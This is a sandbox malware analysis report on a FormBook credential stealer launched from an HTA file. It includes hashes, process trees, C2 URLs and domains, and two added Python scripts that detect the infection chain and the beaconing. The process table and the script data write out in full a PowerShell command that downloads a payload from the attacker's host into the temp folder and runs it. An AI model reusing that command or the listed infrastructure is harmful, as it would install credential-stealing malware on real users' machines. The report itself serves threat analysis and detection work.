URL:

https://canadabestonline.com/hit.hta

Full analysis: https://app.any.run/tasks/c47b280f-edef-478f-b289-f3a709419fcf
Verdict: Malicious activity
Threats:

FormBook is a data stealer distributed as malware-as-a-service (MaaS). It differs from much of the competing malware in its ease of use, which lets even inexperienced threat actors deploy it.

Analysis date: July 11, 2019, 20:32:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, formbook, stealer
Indicators:
MD5: EB0A4EF1BE9C787E40A2FF9D435BCC40
SHA1: 2840051AC31D4294575CB55D3E64B68E0A1ACB40
SHA256: F4FD594B6703D45C7CD8B79DD94D1561843111866BD83104E2AEA727693A4D63
SSDEEP: 3:N8ZLEosLIhKNMtNREn:2OLEdtY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3532)
    • Changes the autorun value in the registry

      • cscript.exe (PID: 2840)
    • FORMBOOK was detected

      • explorer.exe (PID: 284)
    • Connects to CnC server

      • explorer.exe (PID: 284)
    • Application was dropped or rewritten from another process

      • hit.exe (PID: 572)
      • hit.exe (PID: 2880)
    • Formbook was detected

      • Firefox.exe (PID: 2984)
      • cscript.exe (PID: 2840)
    • Actions look like stealing of personal data

      • cscript.exe (PID: 2840)
    • Stealing of credential data

      • cscript.exe (PID: 2840)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3872)
    • Creates files in the user directory

      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 2436)
      • cscript.exe (PID: 2840)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 284)
    • Starts Internet Explorer

      • explorer.exe (PID: 284)
    • Starts MSHTA.EXE for opening HTA or HTML files

      • powershell.exe (PID: 3872)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2436)
    • Starts CMD.EXE for commands execution

      • cscript.exe (PID: 2840)
      • mshta.exe (PID: 2500)
    • Executes scripts

      • explorer.exe (PID: 284)
    • Application launched itself

      • hit.exe (PID: 572)
    • Loads DLL from Mozilla Firefox

      • cscript.exe (PID: 2840)
  • INFO

    • Manual execution by user

      • notepad.exe (PID: 3216)
      • powershell.exe (PID: 3872)
      • cscript.exe (PID: 2840)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3872)
      • iexplore.exe (PID: 2908)
      • powershell.exe (PID: 2436)
    • Changes internet zones settings

      • iexplore.exe (PID: 2908)
    • Application launched itself

      • iexplore.exe (PID: 2908)
    • Creates files in the user directory

      • iexplore.exe (PID: 3308)
      • Firefox.exe (PID: 2984)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2908)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3308)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2908)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3308)
      • mshta.exe (PID: 2500)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 55
Monitored processes: 13
Malicious processes: 6
Suspicious processes: 0

Behavior graph (process tree, reconstructed from the process table below; PIDs in parentheses)

explorer.exe (284)  desktop shell; tagged #FORMBOOK, source of all CnC traffic
  iexplore.exe (2908)  -nohome
    iexplore.exe (3308)  SCODEF:2908 CREDAT:71937, LOW integrity tab; fetches hit[1].hta into the Low\Content.IE5 cache
  notepad.exe (3216)  manual execution by user
  powershell.exe (3872)  manual execution by user (interactive session)
    mshta.exe (2500)  "C:\Users\admin\Desktop\hit.hta"
      cmd.exe (3532)  /c powershell ... DownloadFile('https://canadabestonline.com/sure.fdg','%temp%\hit.exe'); Start '%temp%\hit.exe'
        powershell.exe (2436)  downloads sure.fdg, drops it as C:\Users\admin\AppData\Local\Temp\hit.exe and starts it
          hit.exe (572)
            hit.exe (2880)  launched itself
  cscript.exe (2840)  tagged #FORMBOOK; changes the autorun value, loads Firefox DLLs, credential theft
    cmd.exe  spawned by cscript.exe (no details shown)
firefox.exe (2984)  tagged #FORMBOOK (parent not shown)

Two caveats when reading this tree. First, the top of the chain is analyst activity, not sample behaviour: notepad.exe and powershell.exe (3872) carry the "Manual execution by user" tag, and mshta.exe was launched from that interactive PowerShell session rather than by the browser. The sample's own chain starts at mshta.exe. Second, cscript.exe (2840) also carries the "Manual execution by user" tag, but only because its parent is explorer.exe; the FormBook detection, autorun change and Firefox DLL loads on the same PID mark it as the host of the injected payload. FormBook is known to inject into explorer.exe and then spawn and hollow a legitimate Windows binary (cscript.exe is one of the candidates), which is exactly the parentage shown here.

Process information

PID 2908  iexplore.exe  (parent: explorer.exe)
  CMD:  "C:\Program Files\Internet Explorer\iexplore.exe" -nohome
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Internet Explorer | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3308  iexplore.exe  (parent: iexplore.exe 2908)
  CMD:  "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2908 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity level: LOW
  Description: Internet Explorer | Version: 8.00.7600.16385 (win7_rtm.090713-1255)
  Note: this is the Protected Mode content tab; the HTA lands in its Low\Content.IE5 cache (see dropped files).

PID 3872  powershell.exe  (parent: explorer.exe)
  CMD:  "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
  Path: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Windows PowerShell | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
  Exit code: 3221225786 (0xC000013A, STATUS_CONTROL_C_EXIT: the interactive session was ended with Ctrl-C)

PID 3216  notepad.exe  (parent: explorer.exe)
  CMD:  "C:\Windows\system32\notepad.exe"
  Path: C:\Windows\system32\notepad.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Notepad | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
  Exit code: 0

PID 2500  mshta.exe  (parent: powershell.exe 3872)
  CMD:  "C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\hit.hta"
  Path: C:\Windows\System32\mshta.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Microsoft (R) HTML Application host | Version: 8.00.7600.16385 (win7_rtm.090713-1255)
  Exit code: 0

PID 3532  cmd.exe  (parent: mshta.exe 2500)
  CMD:  "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://canadabestonline.com/sure.fdg','%temp%\hit.exe'); Start '%temp%\hit.exe'
  Path: C:\Windows\System32\cmd.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Windows Command Processor | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
  Exit code: 0

PID 2436  powershell.exe  (parent: cmd.exe 3532)
  CMD:  powershell (new-object System.Net.WebClienT).DownloadFile('https://canadabestonline.com/sure.fdg','C:\Users\admin\AppData\Local\Temp\hit.exe'); Start 'C:\Users\admin\AppData\Local\Temp\hit.exe'
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Windows PowerShell | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
  Exit code: 0
  Note: cmd.exe expanded %temp% before handing the line to PowerShell, so the child shows the full path. The mixed-case "WebClienT" is harmless to PowerShell, which is case-insensitive, but it defeats exact-case string matches on "WebClient".

PID 572  hit.exe  (parent: powershell.exe 2436)
  CMD:  "C:\Users\admin\AppData\Local\Temp\hit.exe"
  Path: C:\Users\admin\AppData\Local\Temp\hit.exe
  User: admin | Company: paraders7 | Integrity level: MEDIUM
  Description: ARNOUX | Version: 1.04.0002
  Exit code: 0

PID 2880  hit.exe  (parent: hit.exe 572)
  CMD:  C:\Users\admin\AppData\Local\Temp\hit.exe"   (as logged, including the unbalanced quote)
  Path: C:\Users\admin\AppData\Local\Temp\hit.exe
  User: admin | Company: paraders7 | Integrity level: MEDIUM
  Description: ARNOUX | Version: 1.04.0002
  Exit code: 0

PID 2840  cscript.exe  (parent: explorer.exe)
  CMD:  "C:\Windows\System32\cscript.exe"
  Path: C:\Windows\System32\cscript.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
  Description: Microsoft ® Console Based Script Host | Version: 5.8.7600.16385
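The chain mshta.exe -> cmd.exe -> powershell.exe -> %temp%\hit.exe above is the whole delivery stage, and it is visible entirely in process parentage and command lines. The following is an added example, not part of the ANY.RUN report: it transcribes the report's process records (parent PIDs filled in from the parent image names) and runs three rules over them, one per stage of the cradle. The rules are this example's assumptions about what to alert on, not ANY.RUN's signatures. Matching is case-insensitive so that the sample's "WebClienT" spelling is caught, and the %temp% form on the cmd.exe line and the expanded path on the PowerShell line are both handled.

```python
"""Detect the HTA -> cmd.exe -> PowerShell download-and-execute chain from this report.

Added example, not part of the ANY.RUN report: the process records are transcribed
from the report's process table (parent PIDs filled in from the parent image names),
and the three rules are this example's assumptions about what to alert on.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str            # executable base name, lower case
    cmdline: str          # command line as logged
    ppid: Optional[int]   # parent PID; None when the parent was not in the table


# Constructed from the report's "Process information" section.
PROCS = [
    Proc(2908, "iexplore.exe",
         '"C:\\Program Files\\Internet Explorer\\iexplore.exe" -nohome', None),
    Proc(3308, "iexplore.exe",
         '"C:\\Program Files\\Internet Explorer\\iexplore.exe" SCODEF:2908 CREDAT:71937', 2908),
    Proc(3872, "powershell.exe",
         '"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"', None),
    Proc(2500, "mshta.exe",
         '"C:\\Windows\\System32\\mshta.exe" "C:\\Users\\admin\\Desktop\\hit.hta"', 3872),
    Proc(3532, "cmd.exe",
         '"C:\\Windows\\System32\\cmd.exe" /c powershell (new-object System.Net.WebClienT)'
         ".DownloadFile('https://canadabestonline.com/sure.fdg','%temp%\\hit.exe'); "
         "Start '%temp%\\hit.exe'", 2500),
    Proc(2436, "powershell.exe",
         "powershell (new-object System.Net.WebClienT).DownloadFile("
         "'https://canadabestonline.com/sure.fdg','C:\\Users\\admin\\AppData\\Local\\Temp\\hit.exe'); "
         "Start 'C:\\Users\\admin\\AppData\\Local\\Temp\\hit.exe'", 3532),
    Proc(572, "hit.exe", '"C:\\Users\\admin\\AppData\\Local\\Temp\\hit.exe"', 2436),
    Proc(2880, "hit.exe", 'C:\\Users\\admin\\AppData\\Local\\Temp\\hit.exe"', 572),
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Download primitives. Matched case-insensitively: PowerShell does not care about
# case, and the sample spells it "WebClienT" to slip past exact-case string matches.
DOWNLOAD_RE = re.compile(
    r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.IGNORECASE,
)
# Local path argument of DownloadFile('<url>', '<path>').
DOWNLOAD_TARGET_RE = re.compile(r"downloadfile\(\s*'[^']*'\s*,\s*'([^']+)'", re.IGNORECASE)
# Either the unexpanded %temp% (cmd.exe line) or the expanded path (PowerShell line).
TEMP_DIR_RE = re.compile(r"%temp%|\\appdata\\local\\temp\\", re.IGNORECASE)


def ancestors(procs: List[Proc], pid: int):
    """Yield the parent chain of `pid`, nearest parent first; stops on gaps or loops."""
    table = {p.pid: p for p in procs}
    seen = {pid}
    cur = table.get(pid)
    while cur is not None and cur.ppid is not None and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = table.get(cur.ppid)
        if cur is not None:
            yield cur


def find_download_cradle(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, rule) findings for the three stages of the cradle."""
    findings = []
    for p in procs:
        if p.image not in SHELLS:
            continue
        # Rule 1: a shell whose ancestry includes a script host (mshta/wscript/cscript).
        if any(a.image in SCRIPT_HOSTS for a in ancestors(procs, p.pid)):
            findings.append((p.pid, "shell_spawned_by_script_host"))
        # Rule 2: a download primitive on the shell's command line.
        if DOWNLOAD_RE.search(p.cmdline):
            findings.append((p.pid, "download_primitive_on_cmdline"))
            m = DOWNLOAD_TARGET_RE.search(p.cmdline)
            if m and TEMP_DIR_RE.search(m.group(1)):
                target = m.group(1).lower()
                # Rule 3: the file written under %temp% is then run as a direct child.
                for child in procs:
                    if child.ppid == p.pid and target in child.cmdline.lower():
                        findings.append((child.pid, "dropped_temp_binary_executed"))
    return findings


if __name__ == "__main__":
    for pid, rule in find_download_cradle(PROCS):
        print(f"PID {pid}: {rule}")
```

Run stand-alone it prints five findings: both shells (3532 and 2436) trip rules 1 and 2, and hit.exe (572) trips rule 3 because its command line is the path the PowerShell line wrote to. The manually started powershell.exe (3872) produces nothing, since it has no script-host ancestor and no download primitive; that is the distinction between analyst activity and sample activity that the "Manual execution by user" tag above is trying to make.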
Total events: 4 139
Read events: 3 051
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 1
Suspicious files: 77
Text files: 11
Unknown types: 4

Dropped files

PID 2908  iexplore.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
  Type: not shown | MD5: not shown | SHA256: not shown

PID 2908  iexplore.exe
  C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
  Type: not shown | MD5: not shown | SHA256: not shown

PID 3308  iexplore.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WNGXXNCX\hit[1].hta
  Type: not shown | MD5: not shown | SHA256: not shown
  (the HTA as fetched by the low-integrity tab)

PID 3872  powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3CWRCEDQCZBFFGRJN6LA.temp
  Type: not shown | MD5: not shown | SHA256: not shown

PID 2436  powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CMM8ENTZ4TNU7VUVYI02.temp
  Type: not shown | MD5: not shown | SHA256: not shown

PID 3308  iexplore.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat
  Type: dat | MD5: 9EF5A2F3ACCB1C7C87F083AB782C775C | SHA256: 002F6A8D5C8DEED6E1DB388DDE80EC89D23F9E0BF6508E9E67284427985C8763

PID 2436  powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF172df5.TMP
  Type: binary | MD5: 47388A8B771AD359484FBDBC4C2AF508 | SHA256: 710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0

PID 2908  iexplore.exe
  C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712\index.dat
  Type: dat | MD5: B89227F3ACA775DAD740F53162853C92 | SHA256: AC038355E0641F5528C76ED7C1063E126F4EAA10EF8EC3F819BC7464DF57C105

PID 2436  powershell.exe
  C:\Users\admin\AppData\Local\Temp\hit.exe
  Type: executable | MD5: BFADBD7CD19542C4C45ADFAECA6A2953 | SHA256: C503385BB1DCD8FB868FEED328BFE393E75AF7BB8E55A345D7246CADEED48B73
  (the payload downloaded as sure.fdg; these are the hashes to pivot on for the FormBook binary and they differ from the Indicators hashes at the top of the report)

PID 3872  powershell.exe
  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Type: binary | MD5: B86F99439FDE7995271894C47E047E0B | SHA256: D78A5A34DE1574358E5A6F59336530ECBE2AD4B9147E99EADF942601AE000CF6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 6
TCP/UDP connections: 12
DNS requests: 7
Threats: 0

HTTP requests

PID 284  explorer.exe  GET  code: not shown  184.168.221.40:80  CN: US  reputation: malicious
  http://www.shizaina.com/hx299/?sZU8y8=pq+llpkZHIdEik0oLKMNiPUiEbqCGE3zyi8fYKoLspNS8TpjB8kPlF1bXw54CK57pwTX/w==&3fr8=arfH5hThsV3LpP

PID 284  explorer.exe  POST  code: not shown  198.187.30.187:80  CN: US  reputation: malicious
  http://www.regular123.com/hx299/

PID 284  explorer.exe  GET  404  198.187.30.187:80  CN: US  type: html, 329 b  reputation: malicious
  http://www.regular123.com/hx299/?sZU8y8=G3lwFF3lNnew5MpaGSjhtJRlS3aXP9OJe+JtBuFCI1kpU0rUP5SRJWq7zMW3elqxdbXXYA==&3fr8=arfH5hThsV3LpP

PID 284  explorer.exe  POST  code: not shown  198.187.30.187:80  CN: US  reputation: malicious
  http://www.regular123.com/hx299/

PID 284  explorer.exe  POST  code: not shown  198.187.30.187:80  CN: US  reputation: malicious
  http://www.regular123.com/hx299/

PID 2908  iexplore.exe  GET  200  204.79.197.200:80  CN: US  type: image, 237 b  reputation: whitelisted
  http://www.bing.com/favicon.ico

Connections

PID   Process         IP                   Domain                 ASN                    CN  Reputation
2908  iexplore.exe    204.79.197.200:80    www.bing.com           Microsoft Corporation  US  whitelisted
2908  iexplore.exe    162.144.182.73:443   canadabestonline.com   Unified Layer          US  malicious
2436  powershell.exe  162.144.182.73:443   canadabestonline.com   Unified Layer          US  malicious
3308  iexplore.exe    162.144.182.73:443   canadabestonline.com   Unified Layer          US  malicious
3872  powershell.exe  162.144.182.73:443   canadabestonline.com   Unified Layer          US  malicious
284   explorer.exe    184.168.221.40:80    www.shizaina.com       GoDaddy.com, LLC       US  malicious
284   explorer.exe    198.187.30.187:80    www.regular123.com     Namecheap, Inc.        US  malicious

DNS requests

Domain                     IP                              Reputation
www.bing.com               204.79.197.200, 13.107.21.200   whitelisted
canadabestonline.com       162.144.182.73                  unknown
www.centrahydraulics.com   (none listed)                   unknown
www.shizaina.com           184.168.221.40                  malicious
www.fabioimbraguglia.com   (none listed)                   unknown
www.regular123.com         198.187.30.187                  malicious
www.softfixin.com          (none listed)                   unknown
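The network side has two features worth turning into detection logic: the beacons come from explorer.exe rather than a browser, and they pair a GET with a two-parameter query (a long base64-looking value plus a short token) with bare POSTs to the same short path, /hx299/, on more than one domain. The DNS list also contains names that never resolved; FormBook is known to query decoy domains alongside its live C2, so those should not go straight onto a blocklist with the same confidence as the contacted ones. The following is an added example, not part of the ANY.RUN report: it transcribes the report's HTTP, connection and DNS records and applies this example's own heuristics (the URL-shape rules and the three-way domain classification are assumptions, not ANY.RUN's signatures).

```python
"""Triage FormBook-style C2 beaconing and sort the DNS names the sample touched.

Added example, not part of the ANY.RUN report. Records are transcribed from the
report; the URL-shape heuristics and the domain classes are this example's assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# (pid, image, method, http_code or None, url), from the report's HTTP table.
HTTP = [
    (284, "explorer.exe", "GET", None,
     "http://www.shizaina.com/hx299/?sZU8y8=pq+llpkZHIdEik0oLKMNiPUiEbqCGE3zyi8fYKoLspNS8TpjB8kPlF1bXw54CK57pwTX/w==&3fr8=arfH5hThsV3LpP"),
    (284, "explorer.exe", "POST", None, "http://www.regular123.com/hx299/"),
    (284, "explorer.exe", "GET", 404,
     "http://www.regular123.com/hx299/?sZU8y8=G3lwFF3lNnew5MpaGSjhtJRlS3aXP9OJe+JtBuFCI1kpU0rUP5SRJWq7zMW3elqxdbXXYA==&3fr8=arfH5hThsV3LpP"),
    (284, "explorer.exe", "POST", None, "http://www.regular123.com/hx299/"),
    (284, "explorer.exe", "POST", None, "http://www.regular123.com/hx299/"),
    (2908, "iexplore.exe", "GET", 200, "http://www.bing.com/favicon.ico"),
]
# (pid, image, ip:port, domain), from the report's Connections table.
CONNS = [
    (2908, "iexplore.exe", "204.79.197.200:80", "www.bing.com"),
    (2908, "iexplore.exe", "162.144.182.73:443", "canadabestonline.com"),
    (2436, "powershell.exe", "162.144.182.73:443", "canadabestonline.com"),
    (3308, "iexplore.exe", "162.144.182.73:443", "canadabestonline.com"),
    (3872, "powershell.exe", "162.144.182.73:443", "canadabestonline.com"),
    (284, "explorer.exe", "184.168.221.40:80", "www.shizaina.com"),
    (284, "explorer.exe", "198.187.30.187:80", "www.regular123.com"),
]
# domain -> answers, from the report's DNS table (empty list = no answer listed).
DNS = {
    "www.bing.com": ["204.79.197.200", "13.107.21.200"],
    "canadabestonline.com": ["162.144.182.73"],
    "www.centrahydraulics.com": [],
    "www.shizaina.com": ["184.168.221.40"],
    "www.fabioimbraguglia.com": [],
    "www.regular123.com": ["198.187.30.187"],
    "www.softfixin.com": [],
}

PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # one short directory segment
B64_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")   # base64 alphabet, optional padding
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split on & and = without unquoting: parse_qsl would turn '+' into a space
    and break the base64 test."""
    pairs = []
    for kv in query.split("&"):
        if kv:
            k, _, v = kv.partition("=")
            pairs.append((k, v))
    return pairs


def looks_like_checkin_get(url: str) -> bool:
    """GET to /<short>/ with exactly two parameters, the first base64-looking."""
    u = urlsplit(url)
    params = split_query(u.query)
    return (PATH_RE.match(u.path) is not None
            and len(params) == 2
            and B64_RE.match(params[0][1]) is not None)


def find_checkins(http) -> List[dict]:
    """Group requests by (pid, path) and flag groups that pair a check-in GET
    with a bare POST to the same path, possibly across several hosts."""
    groups = defaultdict(lambda: {"image": None, "hosts": set(), "gets": 0, "posts": 0})
    for pid, image, method, _code, url in http:
        u = urlsplit(url)
        if not PATH_RE.match(u.path):
            continue
        g = groups[(pid, u.path)]
        g["image"] = image
        g["hosts"].add(u.hostname)
        if method == "GET" and looks_like_checkin_get(url):
            g["gets"] += 1
        elif method == "POST" and not u.query:
            g["posts"] += 1
    findings = []
    for (pid, path), g in groups.items():
        if g["gets"] and g["posts"]:
            findings.append({"pid": pid, "image": g["image"], "path": path,
                             "hosts": sorted(g["hosts"]), "gets": g["gets"], "posts": g["posts"],
                             # a shell process speaking HTTP on its own is a finding by itself
                             "non_browser": g["image"].lower() not in BROWSERS})
    return findings


def classify_domains(dns: Dict[str, List[str]], conns) -> Dict[str, str]:
    """contacted: a monitored process connected; resolved_only: answered but never
    connected; unresolved: no answer listed (FormBook queries decoy names, so these
    are weak indicators on their own)."""
    contacted = {domain for _pid, _image, _addr, domain in conns}
    out = {}
    for domain, answers in dns.items():
        out[domain] = "contacted" if domain in contacted else ("resolved_only" if answers else "unresolved")
    return out


if __name__ == "__main__":
    for f in find_checkins(HTTP):
        print(f)
    for d, s in classify_domains(DNS, CONNS).items():
        print(f"{d}: {s}")
```

On this report the GET/POST grouping yields a single finding: explorer.exe (284) beaconing to /hx299/ on both www.shizaina.com and www.regular123.com (2 check-in GETs, 3 POSTs, non-browser process), while the bing favicon fetch is ignored by the path rule. The domain classification marks the four connected names as contacted and the three unanswered ones as unresolved; none are resolved-only.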

Threats

PID  Process       Class                          Message
284  explorer.exe  A Network Trojan was detected  MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284  explorer.exe  A Network Trojan was detected  MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284  explorer.exe  A Network Trojan was detected  MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
284  explorer.exe  A Network Trojan was detected  MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
4 ETPRO signatures available at the full report
No debug info